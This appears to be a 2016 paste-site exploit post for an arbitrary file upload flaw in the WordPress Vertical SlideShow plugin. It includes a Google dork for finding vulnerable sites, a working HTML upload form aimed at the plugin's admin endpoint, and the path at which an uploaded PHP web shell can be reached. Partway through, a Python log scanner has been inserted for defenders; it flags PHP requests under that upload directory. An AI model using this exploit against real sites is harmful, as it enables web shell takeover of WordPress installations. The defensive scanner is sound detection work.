VirusXDz

WordPress Vertical SlideShow Plugin file upload

Aug 9th, 2016
<!--


    \ \   / (_)_ __ _   _ ___\ \/ /  _ \ ____
     \ \ / /| | '__| | | / __|\  /| | | |_  /
      \ V / | | |  | |_| \__ \/  \| |_| |/ /
       \_/  |_|_|   \__,_|___/_/\_\____//___|

                                              -->
#########################################################
#Exploit Title: Exploit WordPress Arbitrary File Upload Vulnerability in Vertical SlideShow
#Category: webapps
#Google Dork: inurl:/wp-content/plugins/wp-vertical-gallery/
#########################################################

[+] Proof of Concept:

The following proof of concept will create a new category in the plugin, with
the selected file as the Category Image. If there are no pre-existing categories,
the uploaded file will be located in the directory
/wp-content/uploads/vertical/1_uploadfolder/big/.

Replace "[path to WordPress]" with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=vertical_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="vrt_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

[+] Shell access:

http://www.Target.com/wp-content/uploads/vertical/1_uploadfolder/big/shell.php
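As an added detection example for defenders (not part of the original paste): the upload tree named above should only ever serve category images, so this Python parses combined-format web access log lines and flags any request for a PHP or other non-image file under it. The sample log lines are constructed and the extension lists are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Upload root named in the paste; the plugin only stores category images
# below it, so a request for anything executable from this tree is a signal.
UPLOAD_PREFIX = "/wp-content/uploads/vertical/"
# Extension lists are assumptions for this example, not from the paste.
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif", "bmp", "webp"}
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}

# Combined log format: ip ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def classify_path(target):
    """'executable' / 'unexpected' / None (outside the tree or a normal image)."""
    path = unquote(urlsplit(target).path)   # drop query string, decode %xx
    if not path.startswith(UPLOAD_PREFIX):
        return None
    name = path.rsplit("/", 1)[-1]
    # Check every extension, not just the last: "x.php.jpg" must still be
    # caught because some server configs execute on the first match.
    exts = name.lower().split(".")[1:]
    if any(e in EXECUTABLE_EXTS for e in exts):
        return "executable"
    if not exts or exts[-1] not in IMAGE_EXTS:
        return "unexpected"
    return None

def scan_log(lines):
    """Return (ip, status, verdict, target) for every suspicious request."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format line; skip rather than guess
        verdict = classify_path(m["target"])
        if verdict:
            alerts.append((m["ip"], m["status"], verdict, m["target"]))
    return alerts

# Constructed sample log lines (RFC 5737 test addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Aug/2016:10:00:01 +0000] "GET /wp-content/uploads/vertical/1_uploadfolder/big/cat.jpg HTTP/1.1" 200 5120',
    '203.0.113.5 - - [09/Aug/2016:10:00:07 +0000] "GET /wp-content/uploads/vertical/1_uploadfolder/big/shell.php?v=1 HTTP/1.1" 200 312',
    '203.0.113.5 - - [09/Aug/2016:10:00:09 +0000] "GET /wp-content/uploads/vertical/1_uploadfolder/big/x.php.jpg HTTP/1.1" 200 312',
    '198.51.100.9 - - [09/Aug/2016:10:01:00 +0000] "GET /wp-content/uploads/2016/08/logo.png HTTP/1.1" 200 9000',
]
```

`scan_log(SAMPLE_LOG)` returns two hits, the `shell.php` and `x.php.jpg` requests, both with status 200, which means the server handed the file to PHP rather than refusing it. Beyond alerting, the durable fix is to deny script execution under wp-content/uploads at the web-server layer so an uploaded .php is never interpreted even when the upload itself succeeds.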

Video
https://youtu.be/54ytssnD1JQ

Bye..
Algerien Hacker